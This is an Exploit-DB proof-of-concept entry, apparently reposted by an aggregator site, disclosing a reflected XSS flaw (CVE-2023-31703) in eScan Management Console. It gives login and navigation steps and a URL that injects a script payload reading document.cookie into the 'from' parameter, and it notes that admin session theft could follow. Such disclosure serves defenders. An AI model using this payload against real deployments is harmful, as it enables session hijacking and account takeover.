[webapps] eScan Management Console 14.0.1400.2281 - Cross Site Scripting
2023-5-23 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏

# Exploit Title: eScan Management Console 14.0.1400.2281 - Cross Site Scripting
# Date: 2023-05-16
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31703

*Step of Reproduction/ Proof of Concept(POC)*

1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as
shown below and a valid XSS pop up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
4. By exploiting this vulnerability, any arbitrary attacker could have
stolen an admin user session cookie to perform account takeover.
            

文章来源: https://www.exploit-db.com/exploits/51467
如有侵权请联系:admin#unsafe.sh